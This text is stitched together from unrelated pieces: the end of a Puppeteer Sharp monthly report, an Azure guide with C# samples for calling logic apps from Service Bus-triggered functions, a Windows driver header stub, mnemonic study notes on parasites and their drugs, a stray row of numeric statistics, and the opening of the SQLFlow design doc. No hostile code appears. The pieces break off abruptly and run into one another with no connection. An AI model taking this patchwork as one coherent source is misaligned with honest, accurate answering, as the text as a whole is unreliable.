* Nuget downloads: 32278 (prev. 26856) +20%
# Contributors
[Bilal Durrani](https://github.com/bdurrani) contributed a document on how to reuse a Chrome instance.
[Stuart Blackler](https://github.com/Im5tu) pushed 2 PRs, fixing event leaks and reducing allocations.
[Meir Blachman](https://www.twitter.com/MeirBlachman) added support to `WaitUntil` in `Page.SetContentAsync`.
As I mentioned before, [Dominic Böttger](https://twitter.com/dboettger) did a great job adding Linux support.
# Final Words
I’m looking forward to getting more feedback. Having real-world feedback helps us a lot. The issues tab in GitHub is open for all of you to share your ideas and thoughts. You can also follow me on Twitter [@hardkoded](https://twitter.com/hardkoded).
Don't stop coding!
#### Previous Reports
* [December 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-dec-2018)
* [November 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-nov-2018)
* [October 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-oct-2018)
* [September 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-sep-2018)
* [July 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-jul-2018)
* [June 2018](https://www.hardkoded.com/blog/puppeteer-sharp-monthly-jun-2018)
* [May 2018](https://www.hardkoded.com/blogs/puppeteer-sharp-monthly-may-2018)
* [April 2018](https://www.hardkoded.com/blogs/puppeteer-sharp-monthly-april-2018)
* [March 2018](https://www.hardkoded.com/blogs/puppeteer-sharp-monthly-march-2018)
---
title: Call logic apps with Azure Functions
description: Create Azure functions that call or trigger logic apps by listening to Azure Service Bus
services: logic-apps
ms.suite: integration
ms.reviewer: jehollan, klam, logicappspm
ms.topic: article
ms.date: 11/08/2019
ms.openlocfilehash: afd2735bae2a79ad942c347219019ef200b61070
ms.sourcegitcommit: 2ec4b3d0bad7dc0071400c2a2264399e4fe34897
ms.translationtype: HT
ms.contentlocale: fr-FR
ms.lasthandoff: 03/27/2020
ms.locfileid: "75428703"
---
# <a name="call-or-trigger-logic-apps-by-using-azure-functions-and-azure-service-bus"></a>Call or trigger logic apps by using Azure Functions and Azure Service Bus
You can use [Azure Functions](../azure-functions/functions-overview.md) to trigger a logic app when you need to deploy a long-running listener or task. For example, you can create an Azure function that listens on an [Azure Service Bus](../service-bus-messaging/service-bus-messaging-overview.md) queue and immediately fires a logic app as a push trigger.
## <a name="prerequisites"></a>Prerequisites
* An Azure subscription. If you don't have an Azure subscription, [sign up for a free Azure account](https://azure.microsoft.com/free/).
* An Azure Service Bus namespace. If you don't have a namespace, [create your namespace first](../service-bus-messaging/service-bus-create-namespace-portal.md).
* An Azure function app, which is a container for Azure functions. If you don't have a function app, [create your function app first](../azure-functions/functions-create-first-azure-function.md), and make sure that you select .NET as the runtime stack.
* Basic knowledge about [how to create logic apps](../logic-apps/quickstart-create-first-logic-app-workflow.md)
## <a name="create-logic-app"></a>Create logic app
For this scenario, you have a function running each logic app that you want to trigger. First, create a logic app that starts with an HTTP request trigger. The function calls that endpoint each time a queue message is received.
1. Sign in to the [Azure portal](https://portal.azure.com), and create a blank logic app.
   If you're new to logic apps, review [Quickstart: Create your first logic app](../logic-apps/quickstart-create-first-logic-app-workflow.md).
1. In the search box, enter `http request`. From the triggers list, select the **When a HTTP request is received** trigger.
   ![Select Request trigger](./media/logic-apps-scenario-function-sb-trigger/when-http-request-received-trigger.png)
   With the Request trigger, you can optionally enter a JSON schema to use with the queue message. JSON schemas help the Logic App Designer understand the structure of the input data and make it easier to use the outputs in your workflow.
1. To specify a schema, enter the schema in the **Request Body JSON Schema** box, for example:
   ![Specify JSON schema](./media/logic-apps-scenario-function-sb-trigger/when-http-request-received-trigger-schema.png)
   If you don't have a schema but you have a sample payload in JSON format, you can generate a schema from that payload.
1. In the Request trigger, select **Use sample payload to generate schema**.
1. Under **Enter or paste a sample JSON payload**, enter your sample payload, and then select **Done**.
   ![Enter sample payload](./media/logic-apps-scenario-function-sb-trigger/enter-sample-payload.png)
   This sample payload generates the following schema, which appears in the trigger:
```json
{
"type": "object",
"properties": {
"address": {
"type": "object",
"properties": {
"number": {
"type": "integer"
},
"street": {
"type": "string"
},
"city": {
"type": "string"
},
"postalCode": {
"type": "integer"
},
"country": {
"type": "string"
}
}
}
}
}
```
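For reference, a payload that conforms to this schema looks like the following (the values are illustrative only):

```json
{
  "address": {
    "number": 1234,
    "street": "Main Street",
    "city": "Seattle",
    "postalCode": 98101,
    "country": "USA"
  }
}
```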
1. Add any other actions that you want to run after receiving the queue message.
   For example, you can send an email with the Office 365 Outlook connector.
1. Save your logic app, which generates the callback URL for the trigger in this logic app. Later, you use this callback URL in the code for the Azure Service Bus queue trigger.
   The callback URL appears in the **HTTP POST URL** property.
   ![Generated callback URL for trigger](./media/logic-apps-scenario-function-sb-trigger/callback-URL-for-trigger.png)
## <a name="create-azure-function"></a>Create Azure function
Next, create the function that acts as the trigger and listens to the queue.
1. In the Azure portal, open and expand your function app, if not already open.
1. Under your function app name, expand **Functions**. On the **Functions** pane, select **New function**.
   ![Expand "Functions" and select "New function"](./media/logic-apps-scenario-function-sb-trigger/add-new-function-to-function-app.png)
1. Select this template based on whether you created a new function app where you selected .NET as the runtime stack, or you're using an existing function app.
   * For new function apps, select this template: **Service Bus Queue trigger**
     ![Select template for new function app](./media/logic-apps-scenario-function-sb-trigger/current-add-queue-trigger-template.png)
   * For an existing function app, select this template: **Service Bus Queue trigger - C#**
     ![Select template for existing function app](./media/logic-apps-scenario-function-sb-trigger/legacy-add-queue-trigger-template.png)
1. On the **Service Bus Queue trigger** pane, provide a name for your trigger, and set up the **Service Bus connection** for the queue, which uses the Azure Service Bus SDK `OnMessageReceive()` listener, and then select **Create**.
1. Write a basic function to call the previously created logic app endpoint by using the queue message as a trigger. Before you write your function, review these considerations:
   * This example uses the `application/json` message content type, but you can change this type as necessary.
   * Due to the possibility of concurrently running functions, high volumes, or heavy loads, avoid instantiating the [HTTPClient class](https://docs.microsoft.com/dotnet/api/system.net.http.httpclient) with the `using` statement and avoid directly creating HTTPClient instances per request. For more information, see [Use HttpClientFactory to implement resilient HTTP requests](https://docs.microsoft.com/dotnet/architecture/microservices/implement-resilient-applications/use-httpclientfactory-to-implement-resilient-http-requests#issues-with-the-original-httpclient-class-available-in-net-core).
   * If possible, reuse the instance of HTTP clients. For more information, see [Manage connections in Azure Functions](../azure-functions/manage-connections.md).
   This example uses the [`Task.Run` method](https://docs.microsoft.com/dotnet/api/system.threading.tasks.task.run) in [asynchronous](https://docs.microsoft.com/dotnet/csharp/language-reference/keywords/async) mode. For more information, see [Asynchronous programming with async and await](https://docs.microsoft.com/dotnet/csharp/programming-guide/concepts/async/).
```csharp
using System;
using System.Threading.Tasks;
using System.Net.Http;
using System.Text;
// Can also fetch from App Settings or environment variable
private static string logicAppUri = @"https://prod-05.westus.logic.azure.com:443/workflows/<remaining-callback-URL>";
// Reuse the instance of HTTP clients if possible: https://docs.microsoft.com/azure/azure-functions/manage-connections
private static HttpClient httpClient = new HttpClient();
public static async Task Run(string myQueueItem, TraceWriter log)
{
log.Info($"C# ServiceBus queue trigger function processed message: {myQueueItem}");
var response = await httpClient.PostAsync(logicAppUri, new StringContent(myQueueItem, Encoding.UTF8, "application/json"));
}
```
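To exercise the trigger end to end, you can also enqueue a test message programmatically instead of using a GUI tool. The following sketch assumes the `Azure.Messaging.ServiceBus` NuGet package; the connection string and queue name are placeholders, not values from this article:

```csharp
using Azure.Messaging.ServiceBus;

// Placeholders - substitute your namespace connection string and queue name.
string connectionString = "<service-bus-connection-string>";
string queueName = "<queue-name>";

await using var client = new ServiceBusClient(connectionString);
ServiceBusSender sender = client.CreateSender(queueName);

// JSON body matching the Request trigger schema defined earlier.
string payload = @"{ ""address"": { ""number"": 1234, ""street"": ""Main Street"",
    ""city"": ""Seattle"", ""postalCode"": 98101, ""country"": ""USA"" } }";

await sender.SendMessageAsync(new ServiceBusMessage(payload)
{
    ContentType = "application/json"
});
```

When the function picks up this message, it posts the body to the logic app's callback URL.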
1. To test the function, add a queue message by using a tool such as [Service Bus Explorer](https://github.com/paolosalvatori/ServiceBusExplorer).
   The logic app triggers immediately after the function receives the message.
## <a name="next-steps"></a>Next steps
* [Call, trigger, or nest workflows by using HTTP endpoints](../logic-apps/logic-apps-http-endpoint.md)
---
description: "Learn more about: Wudfddi_Hwaccess.h header"
UID: NA:wudfddi_hwaccess
title: Wudfddi_Hwaccess.h header
ms.assetid: 980bceb7-c24c-3b37-ba92-d94daf1c0aea
ms.date: 05/09/2018
keywords: ["Wudfddi_Hwaccess.h header"]
ms.keywords:
ms.topic: portal
tech.root: wdf
f1_keywords:
- wudfddi_hwaccess
- wudfddi_hwaccess/wudfddi_hwaccess
api_name:
- wudfddi_hwaccess
---
# Wudfddi_Hwaccess.h header
## -description
This header is used by WDF. For more information, see:
- [Windows Driver Framework](../_wdf/index.md)
---
date: 2020-09-07
---
# 10 Parasites
## Giardia
<!-- Giardia demographics, transmission, which form -->

- backpack: Associated with campers
- poop in water: Fecal oral transmission
- cysts downstream: Transmitted by cysts
- water bottle: Transmitted through poorly filtered drinking water
<!-- Giardia treatment -->

- metro train: Metronidazole treatment
<!-- Giardia diagnosis -->

- Distinct trophozoite form seen on stool O&P
- ELISA boat: ELISA may be used for diagnosis


<!-- Giardia symptoms -->

- yellow stool: Causes steatorrhea, or fatty stool (lactose intolerance due to brush border enzyme deficiency)
## Entamoeba histolytica
<!-- entameoba histolytica 2 forms, transmission, demographics -->

- Do not **ent**er, **his**torical site: **Ent**amoeba **his**tolytica
2 life cycles:
- cyst in water: **Cyst** form
- guy drinking: Cyst form infectious, ingested in contaminated waters
- holding hands: Associated with men who have sex with men. Found to be related to **anal oral** transmission
- Red cups in amoeba: **trophozoites**, invade colon and spread elsewhere
<!-- entamoeba histolytica symptoms -->

- liver map and tomb on right: Right lobe of liver is most common involved site of amoebic liver abscess
- guy with stomach pain: Right upper quadrant pain
- anchovy paste truck: Abscess described as having "anchovy past" consistency
- stains on wall: Intestinal amebiasis: ulcerations in colon
- red stool: Intestinal amebiasis: bloody diarrhea

<!-- entamoeba histolytica diagnosis -->

- O&P: Diagnosis with stool O&P
- red cups: Trophozoites with endocytosed red blood cells under microscope, **pseudopods** looking
- flask: Intestinal biopsy may show flask-shaped lesions



<!-- entamoeba histolytica treatment -->

- Metronidazole drug of choice treatment
- pair of mice: Paromomycin - luminal agent to eliminate cysts
- queen iodus: Iodoquinol - luminal agent to eliminate cysts
## Cryptosporidium
<!-- cryptosporidium demographics, transmission -->

- cane: Severe diarrhea in HIV patients
- Cryptosporidium outbreaks have been associated with **drinking water supplies, swimming pools**, and **recreational water facilities**.
<!-- cryptosporidium 2 phases, pathogenesis, transmission -->

- bubbles: Infectious cysts passed through stool
- pipe: Sporozoites attach to intestinal wall, cause diarrhea and small intestine damage
<!-- cryptosporidium stain and histology -->
- crystals: Oocysts contain 4 motile sporozoites
- cape: Stains **acid fast**


<!-- Cryptosporidium treatment -->

- knit a sock: Nitazoxanide treatment
- sock: Filtration can remove oocysts from water
- spirit bird: Spiramycin treatment
# Protozoa of the CNS
## Toxoplasmosis
<!-- toxoplasmosis transmission and demographics -->

- cane: Immunocompromised at risk; immunocompetent asymptomatic
- pregnant lady: Pregnant women at risk of transplacental transfer
- bowl of meat: Cysts in undercooked meat
- litter box and poop: T. gondii can be transmitted by cat feces
- bird eggs in poops: Oocysts in feces
<!-- toxoplasmosis adult symptoms and diagnosis -->

- extra lenses: Brain abscesses. **Multiple** ring enhancing lesions on CT or MRI
- red: turban: Encephalitis
- ping sticking out turban: Brain biopsy to differentiate from CNS lymphoma

<!-- toxoplasmosis congenital symptoms -->

- cat dressed as statue of liberty: ToRCHeS infection
- milk on head: Congenital Toxoplasmosis: intracranial calcifications
- bowl stuck on head, shaking: Congenital Toxoplasmosis: hydrocephalus and seizures
- flash bulb looking like retina: Congenital Toxoplasmosis: Chorioretinitis
- beethoven: Congenital Toxoplasmosis: Deafness


<!-- toxoplasmosis treatment and prophylaxis -->

- dyed sulfa eggs: Sulfadiazine
- pyramid on eggs: Pyrimethamine
- $100 with cane: Prophylaxis for CD4 count <100
- IgG key with positive kite: Prophylaxis for CD4 count <100 and seropositive for IgG
- egg without pyramid: TMP-SMX for prophylaxis
## Trypanosoma brucei
<!-- trypanosoma bruceii features, motility -->

- multi colored tent: Variable surface glycoprotein coats, undergoing constant antigenic variation, thus recurrent fevers
- single ribbon: Motile with flagella

<!-- trypanosoma brucei causes, transmission, 2 species -->

- Sleeping beauty: African sleeping sickness
- Tea fly: Tsetse fly vector, bite
- map with pins: Gambiense, Rhodesiense
<!-- trypanosoma bruceii symptoms -->

- sleeping: Coma
- necklace: Cervical lymphadenopathy
- cloth: Axillary lymphadenopathy
- undulating hills: Recurrent fevers
<!-- trypanosoma bruceii diagnosis -->

- blood on finger and goat: Trypomastigotes seen on blood smear

<!-- trypanosoma bruceii treatment -->

- bar of mela soap: Melarsoprol treatment - CNS infection
- bottle of serum: Suramin treatment for serum - Peripheral blood infection
## Naegleria fowleri
<!-- Naegleria fowleri causes -->
- brain eating amoeba disease: primary amoebic meningoencephalitis
<!-- Naegleria fowleri demographics, geography, transmission -->

- Nigeria fall: Naegleria fowleri
- scene: Associated with freshwater
- wind surfing dude: Associated with patients involved in water-sports
- water bottles: Associated with nasal irrigation systems and contact lens solution
<!-- Naegleria fowleri pathogenesis, symptoms -->

- cribs: Enters CNS via cribriform plate
- neck brace, red turban: primary amoebic Meningoencephalitis, inflammation of brain/meninges. Fever, neck stiffness, headache
- head on rock: Rapidly fatal, poor prognosis
<!-- Naegleria fowleri diagnosis, treatment -->

- needle in bottle: Lumbar puncture for diagnosis
- frogs: Amphotericin B treatment


# Protozoa of Blood
## Trypanosoma cruzi
<!-- trypanosoma cruzi causes -->

- Che Guevara. Che's Gas: Chagas disease, South and Central America, like Che
<!-- trypanosoma cruzi transmission -->

- "Kissing Bug" bites around victim's mouth, and deposits feces which can later be introduced by scratching area
- bugs, **red** on heart: Transmitted by **Red**uviid, or "Kissing bug"

<!-- trypanosoma cruzi symptoms -->

- asymptomatic acutely. Symptoms several years later
- swollen colon: Megacolon with constipation
- Tunneled up mole: Burrows into endocardium
- floppy heart on bike: Dilated cardiomyopathy
- snake with dilated snake: Mega-esophagus
<!-- trypanosoma cruzi diagnosis -->

- leaked red gas: Diagnosed by blood smear
- red on heart: Trypanosomes may be seen within cardiac myocytes on heart biopsy

cardiac biopsy:

<!-- trypanosoma cruzi treatment -->

- Furry, knee high moccasin boots: Nifurtimox treatment
## Babesia
<!-- babesia causes -->

- Vampire babes: Babesiosis
- Blood-related symptoms
<!-- babesia geography, demographics, transmission -->

- NE cross: NE United States
- Robin of Ixodes: Ixodes tick
- tick shield: tick-borne illness
- deer antlers: Ixodes tick is a deer tick
- sickle: Higher risk of severe disease in sickle cell disease
- hole in robin's shirt: Higher risk of severe disease in asplenia
<!-- babesia symptoms -->

- cracked blood stained windows: Hemolytic anemia
- yellow babe: Jaundice
- Sweating robin: fever
- torn robin shirt: Irregularly cycling fevers
<!-- babesia diagnosis -->

- thick red floor: Babesiosis diagnosed by thick blood smear
- maltese cross: Maltese cross appearance in red blood cells, tetrad of trophozoites, differentiates from malaria


<!-- babesiosis treatment -->

- crows: ma-crow-lide: azithromycin treatment
- Ato-vampire queen: atovaquone treatment
## Plasmodium
<!-- Plasmodium causes -->

- Malaria, especially in Africa
<!-- plasmodium different species, symptoms, and infect -->

mal area: Plasmodium malariae
- buttons 1 and 4 colored like sun: Quartan fever cycle (72 hrs)
- Only infects mature RBC
oval shield and axe: Plasmodium vivax and ovale
- Only infects immature RBC
- Hypnotist: P. vivax and P. ovale produce dormant hypnozoites, hides in liver
- cow hide and liver spot: Hypnozoites in hepatocytes
- Pendulum: Tertian fever cycle (48 hrs)
False mask: Plasmodium falciparum
- Infects all RBC
- irregular torn shirt: irregular fever
- red head dress: Cerebral malaria, parasitized RBC occlude capillaries in brain
- banana head dress: Banana-shaped gametocytes on blood smear
- gold belt: Parasitized RBC's occlude vessels to kidneys
- gold chest plate: Parasitized RBC's occlude vessels to lungs, pulmonary edema
<!-- plasmodium diseases protective against -->

- sickle: Sickle cell, thalassemia, G6PD deficiency disease is protective against P. falciparum
<!-- Plasmodium general treatment, treatment for resistant species, prophylaxis -->

- "Color queen" - chloroquine, beads join together as polymer, blocking plasmodium **heme polymerase**. High resistance
- "Primal queen" - primaquine, can cause anemia in G6PD deficiency. Only treats **hypnozoites**
- "Me-flock queen" - mefloquine, extra strong
- backpack: Mefloquine prophylaxis for travelers to chloroquine resistant areas
- "Ato-vampire queen" - atovaquone, strong
- Iguana: Proguanil
- backpack: Atovaquone/proguanil for travelers to chloroquine resistant areas
**Chloroquine** is effective in eradicating chloroquine-sensitive plasmodia from the bloodstream, but it has no activity against the latent hepatic infections established by _P vivax_ and _P ovale_. **Primaquine** must be added to the regimen to completely eradicate the **hypnozoites**.
Primaquine has limited therapeutic activity against the erythrocytic forms of plasmodia, including trophozoites. Primaquine is not effective in treating chloroquine-resistant strains, which can be managed with mefloquine or quinine, among others.
No antimalarial agent specifically acts to prevent hemolysis. Primaquine is contraindicated in patients with glucose-6-phosphate dehydrogenase deficiency as the medication can cause hemolysis.
<!-- Plasmodium backup treatment for severe infections, given how -->

- artist: Use artemisinins for severe P. falciparum infections
- artist: Use IV artesunate for severe malaria infections; backup
- "Dining queen" - quinidine; backup
- Ivy: Artesunate and quinidine are delivered IV for severe malaria
<!-- quinidine se -->

- tin cans: Side effect of quinidine is cinchonism, including tinnitus/headaches
<!-- plasmodium life cycle -->

- mushroom: Anopheles mosquitoes carry **sporozoites** in saliva. Biting transmission to blood and then liver
- liver spot: Sporozoites mature to **trophozoites** in liver. Divide and cause RBC to become less flexible = splenomegaly
- RBC and small merozoites: Schizont divides into **merozoites** which burst from hepatocyte and infect RBCs
- lifecycle continues in RBC: trophozoite -> schizont -> merozoites -> infect RBC
- ring spot: Ring form of immature schizont
- male/female symbol: Merozoite can also form gametocyte, ingested by female mosquitos and stored in saliva
Mosquito bite releases **sporozoites** into the bloodstream, which are eventually carried to the liver to **infect hepatocytes**. In hepatocytes, **sporozoites divide into merozoites** and are eventually released from hepatocytes to infect red blood cells (RBCs)
In RBCs, **merozoites develop into trophozoites**, which divide and eventually **cause infected RBCs to become less flexible**. These infected RBCs accumulate and are destroyed in the spleen, leading to **splenomegaly**.
In addition, trophozoites in infected RBCs can **mature into schizonts, which rupture the RBC membrane**, releasing merozoites that go on to infect other RBCs.
To complete the cycle, some **merozoites turn into gametocytes**, which are **ingested by female mosquitoes**. In the mosquito, gametocytes fuse forming a diploid zygote, which generates haploid sporozoites that are stored in mosquito salivary glands.
<!-- plasmodium stain, histology shows -->

- Gems with blood smear: Blood stain and Giemsa stain to see parasites in RBCs
- Schuffner dots: Schüffner dots are unique to _P. vivax/ovale_ and are **morphologic changes that occur in infected host erythrocytes**. They are visible by light microscopy in blood smears, and appear as **multiple brick-red dots**.

- ring shaped P. vivax

- schizont

- banana shaped P. falciparum

## Leishmaniasis
<!-- Leishmaniasis host and transmission -->

- undead Brazilian man with Brazilian flag: Leishmania braziliensis - vertebrates are host
- sand flies around zombie: Sandfly vector
<!-- leishmaniasis cutaneous cause, symptoms, histology, treatment -->

- Leishmania braziliensis - cutaneous leishmaniasis, consumes flesh of victim and causes ulcers
- goat inside cages: Amastigote is intracellular form, seen within macrophages
- T bone steak: Stibogluconate treatment for cutaneous leishmaniasis

- amastigote in macrophages:

<!-- leishmaniasis visceral cause, symptoms, treatment -->

- Donovin: Visceral leishmaniasis caused by Leishmania Donovani
- black spots and sweating: Black fever, or kala-azar
- empty pan: Bone marrow affected causing pancytopenia
- sweating: Fevers
- cow with spots: Hepatosplenomegaly
- frogs: Amphotericin B for visceral leishmaniasis
# Intestinal nematodes
## Enterobius vermicularis
<!-- enterobius vermicularis aka, cause, pathogenesis, diagnosis, treatment -->

- Vermin lady: Enterobius vermicularis, pin worm
- crawling out of round hole with eggs at bottom: Female pin worms lay eggs at the anus
- rats eating rocks: Fecal oral route. Scratch and put in mouth = auto infect
- long cape with rocks: Scotch tape test shows eggs under the microscope
- PAM: pyrantel pamoate
- bending metal bars: albendazole
- on tape:

## Ancylostoma duodenale and Necator
<!-- hookworms are, transmission, pathogenesis, symptoms, labs, treatment -->

- American dude, ankle strings: Ancylostoma duodenale
- American dude, neck strings: Necator americanus
- hook: hookworm
- red boots: Hookworm larvae penetrate skin of soles of feet (walking bare foot)
- arrow on suit: blood stream —> lungs (coughed and swallowed) —> GI tract
- iron dangling with microcytic and hypochromic holes: iron deficiency anemia
- grenades fallen in water: eggs in stool
- Eo sling shot boy with bilobe sling shot: eosinophilia
- PAM: pyrantel pamoate
- bending metal bars: albendazole. Secondary
- cutaneous larva migrans:

## A. lumbricoides
<!-- Ascaris lumbricoides aka, transmission, pathoenesis, symptoms, diagnosis, treatment -->

- lumber man: Ascaris lumbricoides, large round worm
- eating eggs in contaminated food/water
- arrow on suit: blood stream —> lungs (coughed and swallowed) —> GI tract
- bronchial tree on chest: respiratory symptoms
- rocks obstructing: intestinal obstruction at ileocecal valve, malnutrition
- Acorn in puddle: diagnosis by eggs in feces
- Eosinophil granules: eosinophilia
- bending metal bars: albendazole, microtubule inhibitor (avoid in pregnant women)


## Strongyloides
<!-- strongyloides transmission, pathogenesis, diagnosis, treatment -->

- Strong guy: Strongyloides stercoralis
- red boots: larvae penetrate skin of soles of feet
- arrow on suit: blood stream —> lungs (coughed and swallowed) —> GI tract
- round rocks in wall: Autoinfection: Strongyloides larvae hatch from eggs laid in intestinal wall, repenetrate wall, enter blood stream to lungs
- larvae in water: diagnosis by larvae in stool, not eggs
- Eosinophil granules: eosinophilia
- bending metal bars: albendazole, microtubule inhibitor (avoid in pregnant women)
- river mectin, no dumping, drain to river sign: ivermectin


## Trichinella
<!-- trichinella transmission, pathogenesis, symptoms, diagnosis, treatment -->

- Spiral tricksters: Trichinella spiralis
- pork: undercooked pork/bear
- red pipes: Larvae enter blood stream
- striated brick wall: Larvae travel to striated muscle
- explosives on wall: Larvae form cysts within striated muscle
- red glasses: Periorbital edema
- green drool: Vomiting
- sweat: Fever
- fire: muscle inflammation, myalgia
- Eosinophil granules: eosinophilia
- bending metal bars: albendazole, microtubule inhibitor (avoid in pregnant women)

# Tissue Nematodes
## Dracunculus medinensis
<!-- dracunculus medinensis transmission, symptoms, treatment -->

- Dracula: Dracunculus medinensis
- water cooler and copepods cup: D. medinensis transmitted by water contaminated with copepods containing larvae
- Larvae in copepods
- Untied shoe laces: Adult females emerge from painful ulcer in skin
- eo sling shot boy: Eosinophilia
- Shoe lace around water cooler: extract via match stick and twist slowly


## Onchocerca Volvulus
<!-- onchocerca volvulus causes, transmission, symptoms, diagnosis, treatment -->

- Onchocerca volvulus, river blindness
- black fly bites human host, infiltrates skin, mature to adults, produce microfilariae
- chemical stains: Hyper and hypo-pigmented spots occur with onchodermatitis
- hand cover eyes: Microfilariae in eye cause blindness
- pink granules: Eosinophilia
- microscopes: Microfilariae seen in skin biopsy under microscope
- rivermectin sign: Ivermectin
- in vesicles:

## Wuchereria bancrofti
<!-- wuchereria bancrofti transmission, symptoms, diagnosis, treatment -->

- Witch craft: Wuchereria bancrofti
- mosquitos flying around: W. bancrofti transmitted by mosquitos
- large pants: Elephantiasis: long standing lymphedema
- ruffled collar and arm pit: Lymphadenopathy
- coughing: Cough from microfilariae in lungs
- thick smear of blood on hat: Organisms seen on thick blood smear
- granules: Eosinophilia
- Diet and carb magazine: Diethylcarbamazine


## T. Canis
<!-- T. canis aka, transmission, symptoms, treatment -->

- wolfman: Toxocara canis
- aka visceral larva migrans
- stinky poop bag: T. canis transmitted by ingesting food contaminated with dog or cat feces
- larva migrans: never mature, circulates body as larva
- sleep mask: Ocular larva migrans leads to blindness
- granules: Eosinophilia
- bending metal chair legs: Albendazole

## Loa Loa
<!-- loa loa symptoms, diagnosis, treatment -->

- loa loa lagoon
- flies: L. loa transmitted by deer flies
- lumps over arms/legs: Local subcutaneous swellings. _Loa loa_ causes **transient subcutaneous areas of localized angioedema and erythema on the extremities and face** known as Calabar swellings. Pain or itching may precede the development of these lesions.
- worm in eye ball: Adult worms can migrate across conjunctiva
- thick smear of blood on face: Organisms seen on thick blood smear
- granules: Eosinophilia
- Diet and carb magazine: Diethylcarbamazine
- bending chair: Albendazole

# Cestodes (Tapeworms)

## Taenia

- Intermediate host for T. saginata is cattle
- Intermediate host for T. solium is pigs
- Taenia solium
- Taenia saginata
- Hooks on proglottid heads of T. solium seen on O&P
- Neurocysticercosis - causes seizures. "Swiss cheese" appearance on head CT.
- Ingest egg in stool: neurocysticercosis
- Ingest larvae in meat: intestinal infection
- Taenia eggs transmitted by water contaminated with animal feces
- Praziquantel treatment
- Albendazole treatment
## Diphyllobothrium Latum
- Diphyllobothrium latum – fish tapeworm
- B12 deficiency
- Cobalamin deficiency
- Megaloblastic anemia
- Proglottid segments seen on stool O&P
- D. latum is the longest tapeworm
- Praziquantel
- Niclosamide treatment
## Echinococcus Granulosus
- Echinococcus granulosus
- Dogs are definitive host, sheep are intermediate host for E. granulosus
- E. granulosus transmitted by dog feces
- Eggshell calcifications in cyst on liver CT
- Hydatid cyst in liver
- Cysts rupture causes an anaphylactic reaction and acute abdomen
- Eosinophilia

# Trematodes (Flukes)

## Schistosoma
- Swimmers at risk of infection
- Snails are intermediate host
- Migrate against portal flow
- Schistosoma mansoni
- Schistosoma japonicum
- S. mansoni - large lateral spine
- S. japonicum - small spine
- Portal hypertension
- Jaundice
- S. haematobium - large terminal spine
- Hematuria
- S. haematobium - risk of bladder cancer
- Praziquantel treatment

## Clonorchis Sinensis
- Clonorchis sinensis
- Snails are intermediate host
- Biliary fibrosis
- Cholangiocarcinoma
- Pigmented gallstones
- Operculated eggs on O&P
- Praziquantel treatment

## Paragonimus Westermani
- Paragonimus westermani
- Snails are intermediate host
- Transmitted through consumption of raw or undercooked crab meat with larvae
- Chronic cough with bloody sputum
- Operculated eggs on O&P
- Praziquantel treatment
| 35.924863 | 288 | 0.769365 | eng_Latn | 0.742879 |
---

*Source: `doc/syntax.md` from the `uuleon/sqlflow` repository (Apache-2.0).*

# SQLFlow: Design Doc
## What is SQLFlow
SQLFlow is a bridge that connects a SQL engine (for example, MySQL, Hive, SparkSQL, Oracle, or SQL Server) with TensorFlow and other machine learning toolkits. SQLFlow extends the SQL syntax to enable model training and inference.
## Related Work
We could write simple machine learning prediction (or scoring) algorithms in SQL using operators like [`DOT_PRODUCT`](https://thenewstack.io/sql-fans-can-now-develop-ml-applications/). However, this requires copy-n-pasting model parameters from the training program into SQL statements.
Some proprietary SQL engines provide extensions to support machine learning.
### Microsoft SQL Server
Microsoft SQL Server has the [machine learning service](https://docs.microsoft.com/en-us/sql/advanced-analytics/tutorials/rtsql-create-a-predictive-model-r?view=sql-server-2017) that runs machine learning programs in R or Python as an external script:
```sql
CREATE PROCEDURE generate_linear_model
AS
BEGIN
EXEC sp_execute_external_script
@language = N'R'
, @script = N'lrmodel <- rxLinMod(formula = distance ~ speed, data = CarsData);
trained_model <- data.frame(payload = as.raw(serialize(lrmodel, connection=NULL)));'
, @input_data_1 = N'SELECT [speed], [distance] FROM CarSpeed'
, @input_data_1_name = N'CarsData'
, @output_data_1_name = N'trained_model'
WITH RESULT SETS ((model varbinary(max)));
END;
```
A challenge to the users is that they need to know not only SQL but also R or Python, and they must be capable of writing machine learning programs in R or Python.
### Teradata SQL for DL
Teradata also provides a [RESTful service](https://www.linkedin.com/pulse/sql-deep-learning-sql-dl-omri-shiv), which is callable from the extended SQL SELECT syntax.
```sql
SELECT * FROM deep_learning_scorer(
ON (SELECT * FROM cc_data LIMIT 100)
URL('http://localhost:8000/api/v1/request')
ModelName('cc')
ModelVersion('1')
RequestType('predict')
columns('v1', 'v2', ..., 'amount')
)
```
The above syntax couples the deployment of the service (the URL in the above SQL statement) with the algorithm.
### Google BigQuery
Google [BigQuery](https://cloud.google.com/bigquery/docs/bigqueryml-intro) enables machine learning in SQL by introducing the `CREATE MODEL` statement.
```sql
CREATE MODEL dataset.model_name
OPTIONS(model_type='linear_reg', input_label_cols=['input_label'])
AS SELECT * FROM input_table;
```
Currently, BigQuery only supports two simple models: linear regression and logistic regression.
## Design Goal
None of the above meets our requirement.
First of all, we want to build open-source software. Also, we want it to be extensible:
- We want it extensible to many SQL engines, instead of targeting any one of them. Therefore, we don't want to build our syntax extension on top of user-defined functions (UDFs); otherwise, we'd have to implement them for each SQL engine.
- We want the system extensible to support sophisticated machine learning models and toolkits, including TensorFlow for deep learning and [xgboost](https://github.com/dmlc/xgboost) for trees.
Another challenge is that we want SQLFlow to be flexible enough to configure and run cutting-edge algorithms, including specifying [feature crosses](https://www.tensorflow.org/api_docs/python/tf/feature_column/crossed_column). At the same time, we want SQLFlow easy to learn -- at least, no Python or R code embedded in the SQL statements, and integrate hyperparameter estimation.
We understand that a key to address the above challenges is the syntax of the SQL extension. To craft a highly-effective and easy-to-learn syntax, we need user feedback and fast iteration. Therefore, we'd start from a prototype that supports only MySQL and TensorFlow. We plan to support more SQL engines and machine learning toolkits later.
## Design Decisions
As the beginning of the iteration, we propose an extension to the SQL SELECT statement. We are not introducing a new statement the way BigQuery provides `CREATE MODEL`, because we want to maintain loose coupling between our system and the underlying SQL engine, and we cannot create a new data type in the SQL engine, as `CREATE MODEL` requires.
We highly appreciate the work of [TensorFlow Estimator](https://www.tensorflow.org/guide/estimators), a high-level API for deep learning. The basic idea behind Estimator is to implement each deep learning model, and related training/testing/evaluating algorithms as a Python class derived from `tf.estimator.Estimator`. As we want to keep our SQL syntax simple, we would make the system extensible by calling estimators contributed by machine learning experts and written in Python.
